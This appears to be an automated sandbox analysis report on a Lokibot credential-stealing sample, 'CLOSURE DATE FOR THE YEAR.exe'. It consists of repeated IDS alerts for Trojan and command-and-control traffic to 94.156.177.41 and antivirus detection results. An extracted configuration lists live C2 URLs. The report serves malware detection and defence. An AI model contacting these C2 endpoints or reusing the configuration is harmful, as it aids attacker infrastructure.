                2024-12-04T06:53:42.637349+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449896TCP
                2024-12-04T06:53:44.524266+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449902TCP
                2024-12-04T06:53:46.431533+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449906TCP
                2024-12-04T06:53:48.311015+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449912TCP
                2024-12-04T06:53:50.169203+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449916TCP
                2024-12-04T06:53:52.029213+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449920TCP
                2024-12-04T06:53:53.903102+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449925TCP
                2024-12-04T06:53:55.649895+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449930TCP
                2024-12-04T06:53:57.518639+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449936TCP
                2024-12-04T06:53:59.365409+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449941TCP
                2024-12-04T06:54:01.200593+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449946TCP
                2024-12-04T06:54:03.081113+010020254831A Network Trojan was detected94.156.177.4180192.168.2.449950TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:11.901579+010020243131Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                2024-12-04T06:52:13.773578+010020243131Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                2024-12-04T06:52:15.532769+010020243131Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                2024-12-04T06:52:17.218226+010020243131Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                2024-12-04T06:52:19.025824+010020243131Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                2024-12-04T06:52:20.880675+010020243131Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
                2024-12-04T06:52:22.683187+010020243131Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
                2024-12-04T06:52:24.551833+010020243131Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                2024-12-04T06:52:26.403488+010020243131Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                2024-12-04T06:52:28.258701+010020243131Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
                2024-12-04T06:52:30.177926+010020243131Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                2024-12-04T06:52:32.085852+010020243131Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                2024-12-04T06:52:34.340931+010020243131Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                2024-12-04T06:52:36.018358+010020243131Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                2024-12-04T06:52:37.879906+010020243131Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                2024-12-04T06:52:39.817896+010020243131Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                2024-12-04T06:52:41.707155+010020243131Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                2024-12-04T06:52:43.608002+010020243131Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                2024-12-04T06:52:45.535212+010020243131Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                2024-12-04T06:52:47.435569+010020243131Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                2024-12-04T06:52:49.349051+010020243131Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                2024-12-04T06:52:51.251091+010020243131Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                2024-12-04T06:52:52.949423+010020243131Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                2024-12-04T06:52:54.623292+010020243131Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                2024-12-04T06:52:56.524407+010020243131Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                2024-12-04T06:52:58.372095+010020243131Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                2024-12-04T06:53:00.231152+010020243131Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                2024-12-04T06:53:02.093707+010020243131Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                2024-12-04T06:53:04.009007+010020243131Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                2024-12-04T06:53:05.702695+010020243131Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                2024-12-04T06:53:07.476673+010020243131Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                2024-12-04T06:53:09.330217+010020243131Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
                2024-12-04T06:53:11.164303+010020243131Malware Command and Control Activity Detected192.168.2.44981194.156.177.4180TCP
                2024-12-04T06:53:12.980893+010020243131Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                2024-12-04T06:53:14.868129+010020243131Malware Command and Control Activity Detected192.168.2.44981894.156.177.4180TCP
                2024-12-04T06:53:16.678278+010020243131Malware Command and Control Activity Detected192.168.2.44982494.156.177.4180TCP
                2024-12-04T06:53:18.586498+010020243131Malware Command and Control Activity Detected192.168.2.44982994.156.177.4180TCP
                2024-12-04T06:53:20.454492+010020243131Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
                2024-12-04T06:53:22.119370+010020243131Malware Command and Control Activity Detected192.168.2.44984194.156.177.4180TCP
                2024-12-04T06:53:23.990954+010020243131Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
                2024-12-04T06:53:25.847762+010020243131Malware Command and Control Activity Detected192.168.2.44985094.156.177.4180TCP
                2024-12-04T06:53:27.716217+010020243131Malware Command and Control Activity Detected192.168.2.44985594.156.177.4180TCP
                2024-12-04T06:53:29.409695+010020243131Malware Command and Control Activity Detected192.168.2.44986194.156.177.4180TCP
                2024-12-04T06:53:31.273515+010020243131Malware Command and Control Activity Detected192.168.2.44986694.156.177.4180TCP
                2024-12-04T06:53:33.162635+010020243131Malware Command and Control Activity Detected192.168.2.44987194.156.177.4180TCP
                2024-12-04T06:53:35.093148+010020243131Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                2024-12-04T06:53:37.030637+010020243131Malware Command and Control Activity Detected192.168.2.44988194.156.177.4180TCP
                2024-12-04T06:53:38.846753+010020243131Malware Command and Control Activity Detected192.168.2.44988694.156.177.4180TCP
                2024-12-04T06:53:40.713775+010020243131Malware Command and Control Activity Detected192.168.2.44989194.156.177.4180TCP
                2024-12-04T06:53:42.517335+010020243131Malware Command and Control Activity Detected192.168.2.44989694.156.177.4180TCP
                2024-12-04T06:53:44.404340+010020243131Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
                2024-12-04T06:53:46.309965+010020243131Malware Command and Control Activity Detected192.168.2.44990694.156.177.4180TCP
                2024-12-04T06:53:48.190933+010020243131Malware Command and Control Activity Detected192.168.2.44991294.156.177.4180TCP
                2024-12-04T06:53:50.049274+010020243131Malware Command and Control Activity Detected192.168.2.44991694.156.177.4180TCP
                2024-12-04T06:53:51.907714+010020243131Malware Command and Control Activity Detected192.168.2.44992094.156.177.4180TCP
                2024-12-04T06:53:53.783128+010020243131Malware Command and Control Activity Detected192.168.2.44992594.156.177.4180TCP
                2024-12-04T06:53:55.529845+010020243131Malware Command and Control Activity Detected192.168.2.44993094.156.177.4180TCP
                2024-12-04T06:53:57.398751+010020243131Malware Command and Control Activity Detected192.168.2.44993694.156.177.4180TCP
                2024-12-04T06:53:59.245469+010020243131Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                2024-12-04T06:54:01.080502+010020243131Malware Command and Control Activity Detected192.168.2.44994694.156.177.4180TCP
                2024-12-04T06:54:02.961210+010020243131Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:11.901579+010020243181Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                2024-12-04T06:52:13.773578+010020243181Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                2024-12-04T06:52:15.532769+010020243181Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                2024-12-04T06:52:17.218226+010020243181Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                2024-12-04T06:52:19.025824+010020243181Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                2024-12-04T06:52:20.880675+010020243181Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
                2024-12-04T06:52:22.683187+010020243181Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
                2024-12-04T06:52:24.551833+010020243181Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                2024-12-04T06:52:26.403488+010020243181Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                2024-12-04T06:52:28.258701+010020243181Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
                2024-12-04T06:52:30.177926+010020243181Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                2024-12-04T06:52:32.085852+010020243181Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                2024-12-04T06:52:34.340931+010020243181Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                2024-12-04T06:52:36.018358+010020243181Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                2024-12-04T06:52:37.879906+010020243181Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                2024-12-04T06:52:39.817896+010020243181Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                2024-12-04T06:52:41.707155+010020243181Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                2024-12-04T06:52:43.608002+010020243181Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                2024-12-04T06:52:45.535212+010020243181Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                2024-12-04T06:52:47.435569+010020243181Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                2024-12-04T06:52:49.349051+010020243181Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                2024-12-04T06:52:51.251091+010020243181Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                2024-12-04T06:52:52.949423+010020243181Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                2024-12-04T06:52:54.623292+010020243181Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                2024-12-04T06:52:56.524407+010020243181Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                2024-12-04T06:52:58.372095+010020243181Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                2024-12-04T06:53:00.231152+010020243181Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                2024-12-04T06:53:02.093707+010020243181Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                2024-12-04T06:53:04.009007+010020243181Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                2024-12-04T06:53:05.702695+010020243181Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                2024-12-04T06:53:07.476673+010020243181Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                2024-12-04T06:53:09.330217+010020243181Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
                2024-12-04T06:53:11.164303+010020243181Malware Command and Control Activity Detected192.168.2.44981194.156.177.4180TCP
                2024-12-04T06:53:12.980893+010020243181Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                2024-12-04T06:53:14.868129+010020243181Malware Command and Control Activity Detected192.168.2.44981894.156.177.4180TCP
                2024-12-04T06:53:16.678278+010020243181Malware Command and Control Activity Detected192.168.2.44982494.156.177.4180TCP
                2024-12-04T06:53:18.586498+010020243181Malware Command and Control Activity Detected192.168.2.44982994.156.177.4180TCP
                2024-12-04T06:53:20.454492+010020243181Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
                2024-12-04T06:53:22.119370+010020243181Malware Command and Control Activity Detected192.168.2.44984194.156.177.4180TCP
                2024-12-04T06:53:23.990954+010020243181Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
                2024-12-04T06:53:25.847762+010020243181Malware Command and Control Activity Detected192.168.2.44985094.156.177.4180TCP
                2024-12-04T06:53:27.716217+010020243181Malware Command and Control Activity Detected192.168.2.44985594.156.177.4180TCP
                2024-12-04T06:53:29.409695+010020243181Malware Command and Control Activity Detected192.168.2.44986194.156.177.4180TCP
                2024-12-04T06:53:31.273515+010020243181Malware Command and Control Activity Detected192.168.2.44986694.156.177.4180TCP
                2024-12-04T06:53:33.162635+010020243181Malware Command and Control Activity Detected192.168.2.44987194.156.177.4180TCP
                2024-12-04T06:53:35.093148+010020243181Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                2024-12-04T06:53:37.030637+010020243181Malware Command and Control Activity Detected192.168.2.44988194.156.177.4180TCP
                2024-12-04T06:53:38.846753+010020243181Malware Command and Control Activity Detected192.168.2.44988694.156.177.4180TCP
                2024-12-04T06:53:40.713775+010020243181Malware Command and Control Activity Detected192.168.2.44989194.156.177.4180TCP
                2024-12-04T06:53:42.517335+010020243181Malware Command and Control Activity Detected192.168.2.44989694.156.177.4180TCP
                2024-12-04T06:53:44.404340+010020243181Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
                2024-12-04T06:53:46.309965+010020243181Malware Command and Control Activity Detected192.168.2.44990694.156.177.4180TCP
                2024-12-04T06:53:48.190933+010020243181Malware Command and Control Activity Detected192.168.2.44991294.156.177.4180TCP
                2024-12-04T06:53:50.049274+010020243181Malware Command and Control Activity Detected192.168.2.44991694.156.177.4180TCP
                2024-12-04T06:53:51.907714+010020243181Malware Command and Control Activity Detected192.168.2.44992094.156.177.4180TCP
                2024-12-04T06:53:53.783128+010020243181Malware Command and Control Activity Detected192.168.2.44992594.156.177.4180TCP
                2024-12-04T06:53:55.529845+010020243181Malware Command and Control Activity Detected192.168.2.44993094.156.177.4180TCP
                2024-12-04T06:53:57.398751+010020243181Malware Command and Control Activity Detected192.168.2.44993694.156.177.4180TCP
                2024-12-04T06:53:59.245469+010020243181Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                2024-12-04T06:54:01.080502+010020243181Malware Command and Control Activity Detected192.168.2.44994694.156.177.4180TCP
                2024-12-04T06:54:02.961210+010020243181Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:06.767642+010020216411A Network Trojan was detected192.168.2.44973794.156.177.4180TCP
                2024-12-04T06:52:08.695716+010020216411A Network Trojan was detected192.168.2.44973894.156.177.4180TCP
                2024-12-04T06:52:10.478754+010020216411A Network Trojan was detected192.168.2.44973994.156.177.4180TCP
                2024-12-04T06:52:12.295749+010020216411A Network Trojan was detected192.168.2.44974094.156.177.4180TCP
                2024-12-04T06:52:14.164338+010020216411A Network Trojan was detected192.168.2.44974194.156.177.4180TCP
                2024-12-04T06:52:15.938259+010020216411A Network Trojan was detected192.168.2.44974394.156.177.4180TCP
                2024-12-04T06:52:17.657827+010020216411A Network Trojan was detected192.168.2.44974694.156.177.4180TCP
                2024-12-04T06:52:19.405358+010020216411A Network Trojan was detected192.168.2.44975094.156.177.4180TCP
                2024-12-04T06:52:21.262165+010020216411A Network Trojan was detected192.168.2.44975294.156.177.4180TCP
                2024-12-04T06:52:23.073188+010020216411A Network Trojan was detected192.168.2.44975494.156.177.4180TCP
                2024-12-04T06:52:24.932098+010020216411A Network Trojan was detected192.168.2.44975694.156.177.4180TCP
                2024-12-04T06:52:26.793786+010020216411A Network Trojan was detected192.168.2.44975794.156.177.4180TCP
                2024-12-04T06:52:28.638241+010020216411A Network Trojan was detected192.168.2.44975994.156.177.4180TCP
                2024-12-04T06:52:30.565483+010020216411A Network Trojan was detected192.168.2.44976194.156.177.4180TCP
                2024-12-04T06:52:32.892280+010020216411A Network Trojan was detected192.168.2.44976294.156.177.4180TCP
                2024-12-04T06:52:34.734954+010020216411A Network Trojan was detected192.168.2.44976494.156.177.4180TCP
                2024-12-04T06:52:36.409350+010020216411A Network Trojan was detected192.168.2.44976694.156.177.4180TCP
                2024-12-04T06:52:38.347814+010020216411A Network Trojan was detected192.168.2.44976794.156.177.4180TCP
                2024-12-04T06:52:40.197879+010020216411A Network Trojan was detected192.168.2.44976894.156.177.4180TCP
                2024-12-04T06:52:42.088177+010020216411A Network Trojan was detected192.168.2.44976994.156.177.4180TCP
                2024-12-04T06:52:44.074154+010020216411A Network Trojan was detected192.168.2.44977094.156.177.4180TCP
                2024-12-04T06:52:45.927567+010020216411A Network Trojan was detected192.168.2.44977194.156.177.4180TCP
                2024-12-04T06:52:47.828393+010020216411A Network Trojan was detected192.168.2.44977294.156.177.4180TCP
                2024-12-04T06:52:49.779959+010020216411A Network Trojan was detected192.168.2.44977394.156.177.4180TCP
                2024-12-04T06:52:51.635755+010020216411A Network Trojan was detected192.168.2.44977494.156.177.4180TCP
                2024-12-04T06:52:53.344478+010020216411A Network Trojan was detected192.168.2.44977594.156.177.4180TCP
                2024-12-04T06:52:55.009703+010020216411A Network Trojan was detected192.168.2.44977694.156.177.4180TCP
                2024-12-04T06:52:56.900865+010020216411A Network Trojan was detected192.168.2.44977894.156.177.4180TCP
                2024-12-04T06:52:58.761872+010020216411A Network Trojan was detected192.168.2.44978094.156.177.4180TCP
                2024-12-04T06:53:00.620039+010020216411A Network Trojan was detected192.168.2.44978694.156.177.4180TCP
                2024-12-04T06:53:02.477302+010020216411A Network Trojan was detected192.168.2.44979294.156.177.4180TCP
                2024-12-04T06:53:04.401220+010020216411A Network Trojan was detected192.168.2.44979394.156.177.4180TCP
                2024-12-04T06:53:06.095984+010020216411A Network Trojan was detected192.168.2.44979994.156.177.4180TCP
                2024-12-04T06:53:07.851506+010020216411A Network Trojan was detected192.168.2.44980594.156.177.4180TCP
                2024-12-04T06:53:09.713035+010020216411A Network Trojan was detected192.168.2.44981194.156.177.4180TCP
                2024-12-04T06:53:11.637327+010020216411A Network Trojan was detected192.168.2.44981694.156.177.4180TCP
                2024-12-04T06:53:13.370849+010020216411A Network Trojan was detected192.168.2.44981894.156.177.4180TCP
                2024-12-04T06:53:15.244855+010020216411A Network Trojan was detected192.168.2.44982494.156.177.4180TCP
                2024-12-04T06:53:17.057306+010020216411A Network Trojan was detected192.168.2.44982994.156.177.4180TCP
                2024-12-04T06:53:18.965518+010020216411A Network Trojan was detected192.168.2.44983494.156.177.4180TCP
                2024-12-04T06:53:20.841367+010020216411A Network Trojan was detected192.168.2.44984194.156.177.4180TCP
                2024-12-04T06:53:22.493732+010020216411A Network Trojan was detected192.168.2.44984594.156.177.4180TCP
                2024-12-04T06:53:24.369185+010020216411A Network Trojan was detected192.168.2.44985094.156.177.4180TCP
                2024-12-04T06:53:26.229898+010020216411A Network Trojan was detected192.168.2.44985594.156.177.4180TCP
                2024-12-04T06:53:28.109936+010020216411A Network Trojan was detected192.168.2.44986194.156.177.4180TCP
                2024-12-04T06:53:29.804559+010020216411A Network Trojan was detected192.168.2.44986694.156.177.4180TCP
                2024-12-04T06:53:31.659622+010020216411A Network Trojan was detected192.168.2.44987194.156.177.4180TCP
                2024-12-04T06:53:33.543135+010020216411A Network Trojan was detected192.168.2.44987594.156.177.4180TCP
                2024-12-04T06:53:35.720159+010020216411A Network Trojan was detected192.168.2.44988194.156.177.4180TCP
                2024-12-04T06:53:37.417338+010020216411A Network Trojan was detected192.168.2.44988694.156.177.4180TCP
                2024-12-04T06:53:39.230433+010020216411A Network Trojan was detected192.168.2.44989194.156.177.4180TCP
                2024-12-04T06:53:41.090316+010020216411A Network Trojan was detected192.168.2.44989694.156.177.4180TCP
                2024-12-04T06:53:42.933722+010020216411A Network Trojan was detected192.168.2.44990294.156.177.4180TCP
                2024-12-04T06:53:44.792352+010020216411A Network Trojan was detected192.168.2.44990694.156.177.4180TCP
                2024-12-04T06:53:46.706490+010020216411A Network Trojan was detected192.168.2.44991294.156.177.4180TCP
                2024-12-04T06:53:48.570673+010020216411A Network Trojan was detected192.168.2.44991694.156.177.4180TCP
                2024-12-04T06:53:50.433426+010020216411A Network Trojan was detected192.168.2.44992094.156.177.4180TCP
                2024-12-04T06:53:52.290981+010020216411A Network Trojan was detected192.168.2.44992594.156.177.4180TCP
                2024-12-04T06:53:54.163772+010020216411A Network Trojan was detected192.168.2.44993094.156.177.4180TCP
                2024-12-04T06:53:55.922617+010020216411A Network Trojan was detected192.168.2.44993694.156.177.4180TCP
                2024-12-04T06:53:57.777455+010020216411A Network Trojan was detected192.168.2.44994194.156.177.4180TCP
                2024-12-04T06:53:59.620459+010020216411A Network Trojan was detected192.168.2.44994694.156.177.4180TCP
                2024-12-04T06:54:01.491745+010020216411A Network Trojan was detected192.168.2.44995094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-04T06:52:06.767642+010028257661Malware Command and Control Activity Detected192.168.2.44973794.156.177.4180TCP
                2024-12-04T06:52:08.695716+010028257661Malware Command and Control Activity Detected192.168.2.44973894.156.177.4180TCP
                2024-12-04T06:52:10.478754+010028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.4180TCP
                2024-12-04T06:52:12.295749+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.4180TCP
                2024-12-04T06:52:14.164338+010028257661Malware Command and Control Activity Detected192.168.2.44974194.156.177.4180TCP
                2024-12-04T06:52:15.938259+010028257661Malware Command and Control Activity Detected192.168.2.44974394.156.177.4180TCP
                2024-12-04T06:52:17.657827+010028257661Malware Command and Control Activity Detected192.168.2.44974694.156.177.4180TCP
                2024-12-04T06:52:19.405358+010028257661Malware Command and Control Activity Detected192.168.2.44975094.156.177.4180TCP
                2024-12-04T06:52:21.262165+010028257661Malware Command and Control Activity Detected192.168.2.44975294.156.177.4180TCP
                2024-12-04T06:52:23.073188+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.4180TCP
                2024-12-04T06:52:24.932098+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.4180TCP
                2024-12-04T06:52:26.793786+010028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.4180TCP
                2024-12-04T06:52:28.638241+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.4180TCP
                2024-12-04T06:52:30.565483+010028257661Malware Command and Control Activity Detected192.168.2.44976194.156.177.4180TCP
                2024-12-04T06:52:32.892280+010028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.4180TCP
                2024-12-04T06:52:34.734954+010028257661Malware Command and Control Activity Detected192.168.2.44976494.156.177.4180TCP
                2024-12-04T06:52:36.409350+010028257661Malware Command and Control Activity Detected192.168.2.44976694.156.177.4180TCP
                2024-12-04T06:52:38.347814+010028257661Malware Command and Control Activity Detected192.168.2.44976794.156.177.4180TCP
                2024-12-04T06:52:40.197879+010028257661Malware Command and Control Activity Detected192.168.2.44976894.156.177.4180TCP
                2024-12-04T06:52:42.088177+010028257661Malware Command and Control Activity Detected192.168.2.44976994.156.177.4180TCP
                2024-12-04T06:52:44.074154+010028257661Malware Command and Control Activity Detected192.168.2.44977094.156.177.4180TCP
                2024-12-04T06:52:45.927567+010028257661Malware Command and Control Activity Detected192.168.2.44977194.156.177.4180TCP
                2024-12-04T06:52:47.828393+010028257661Malware Command and Control Activity Detected192.168.2.44977294.156.177.4180TCP
                2024-12-04T06:52:49.779959+010028257661Malware Command and Control Activity Detected192.168.2.44977394.156.177.4180TCP
                2024-12-04T06:52:51.635755+010028257661Malware Command and Control Activity Detected192.168.2.44977494.156.177.4180TCP
                2024-12-04T06:52:53.344478+010028257661Malware Command and Control Activity Detected192.168.2.44977594.156.177.4180TCP
                2024-12-04T06:52:55.009703+010028257661Malware Command and Control Activity Detected192.168.2.44977694.156.177.4180TCP
                2024-12-04T06:52:56.900865+010028257661Malware Command and Control Activity Detected192.168.2.44977894.156.177.4180TCP
                2024-12-04T06:52:58.761872+010028257661Malware Command and Control Activity Detected192.168.2.44978094.156.177.4180TCP
                2024-12-04T06:53:00.620039+010028257661Malware Command and Control Activity Detected192.168.2.44978694.156.177.4180TCP
                2024-12-04T06:53:02.477302+010028257661Malware Command and Control Activity Detected192.168.2.44979294.156.177.4180TCP
                2024-12-04T06:53:04.401220+010028257661Malware Command and Control Activity Detected192.168.2.44979394.156.177.4180TCP
                2024-12-04T06:53:06.095984+010028257661Malware Command and Control Activity Detected192.168.2.44979994.156.177.4180TCP
                2024-12-04T06:53:07.851506+010028257661Malware Command and Control Activity Detected192.168.2.44980594.156.177.4180TCP
                2024-12-04T06:53:09.713035+010028257661Malware Command and Control Activity Detected192.168.2.44981194.156.177.4180TCP
                2024-12-04T06:53:11.637327+010028257661Malware Command and Control Activity Detected192.168.2.44981694.156.177.4180TCP
                2024-12-04T06:53:13.370849+010028257661Malware Command and Control Activity Detected192.168.2.44981894.156.177.4180TCP
                2024-12-04T06:53:15.244855+010028257661Malware Command and Control Activity Detected192.168.2.44982494.156.177.4180TCP
                2024-12-04T06:53:17.057306+010028257661Malware Command and Control Activity Detected192.168.2.44982994.156.177.4180TCP
                2024-12-04T06:53:18.965518+010028257661Malware Command and Control Activity Detected192.168.2.44983494.156.177.4180TCP
                2024-12-04T06:53:20.841367+010028257661Malware Command and Control Activity Detected192.168.2.44984194.156.177.4180TCP
                2024-12-04T06:53:22.493732+010028257661Malware Command and Control Activity Detected192.168.2.44984594.156.177.4180TCP
                2024-12-04T06:53:24.369185+010028257661Malware Command and Control Activity Detected192.168.2.44985094.156.177.4180TCP
                2024-12-04T06:53:26.229898+010028257661Malware Command and Control Activity Detected192.168.2.44985594.156.177.4180TCP
                2024-12-04T06:53:28.109936+010028257661Malware Command and Control Activity Detected192.168.2.44986194.156.177.4180TCP
                2024-12-04T06:53:29.804559+010028257661Malware Command and Control Activity Detected192.168.2.44986694.156.177.4180TCP
                2024-12-04T06:53:31.659622+010028257661Malware Command and Control Activity Detected192.168.2.44987194.156.177.4180TCP
                2024-12-04T06:53:33.543135+010028257661Malware Command and Control Activity Detected192.168.2.44987594.156.177.4180TCP
                2024-12-04T06:53:35.720159+010028257661Malware Command and Control Activity Detected192.168.2.44988194.156.177.4180TCP
                2024-12-04T06:53:37.417338+010028257661Malware Command and Control Activity Detected192.168.2.44988694.156.177.4180TCP
                2024-12-04T06:53:39.230433+010028257661Malware Command and Control Activity Detected192.168.2.44989194.156.177.4180TCP
                2024-12-04T06:53:41.090316+010028257661Malware Command and Control Activity Detected192.168.2.44989694.156.177.4180TCP
                2024-12-04T06:53:42.933722+010028257661Malware Command and Control Activity Detected192.168.2.44990294.156.177.4180TCP
                2024-12-04T06:53:44.792352+010028257661Malware Command and Control Activity Detected192.168.2.44990694.156.177.4180TCP
                2024-12-04T06:53:46.706490+010028257661Malware Command and Control Activity Detected192.168.2.44991294.156.177.4180TCP
                2024-12-04T06:53:48.570673+010028257661Malware Command and Control Activity Detected192.168.2.44991694.156.177.4180TCP
                2024-12-04T06:53:50.433426+010028257661Malware Command and Control Activity Detected192.168.2.44992094.156.177.4180TCP
                2024-12-04T06:53:52.290981+010028257661Malware Command and Control Activity Detected192.168.2.44992594.156.177.4180TCP
                2024-12-04T06:53:54.163772+010028257661Malware Command and Control Activity Detected192.168.2.44993094.156.177.4180TCP
                2024-12-04T06:53:55.922617+010028257661Malware Command and Control Activity Detected192.168.2.44993694.156.177.4180TCP
                2024-12-04T06:53:57.777455+010028257661Malware Command and Control Activity Detected192.168.2.44994194.156.177.4180TCP
                2024-12-04T06:53:59.620459+010028257661Malware Command and Control Activity Detected192.168.2.44994694.156.177.4180TCP
                2024-12-04T06:54:01.491745+010028257661Malware Command and Control Activity Detected192.168.2.44995094.156.177.4180TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: CLOSURE DATE FOR THE YEAR.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeAvira: detection malicious, Label: HEUR/AGEN.1357257
                Source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/kings/five/fre.php"]}
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeReversingLabs: Detection: 39%
                Source: CLOSURE DATE FOR THE YEAR.exeReversingLabs: Detection: 39%
                Source: CLOSURE DATE FOR THE YEAR.exeVirustotal: Detection: 47%Perma Link
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeJoe Sandbox ML: detected
                Source: CLOSURE DATE FOR THE YEAR.exeJoe Sandbox ML: detected
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: CLOSURE DATE FOR THE YEAR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WERA61F.tmp.dmp.16.dr
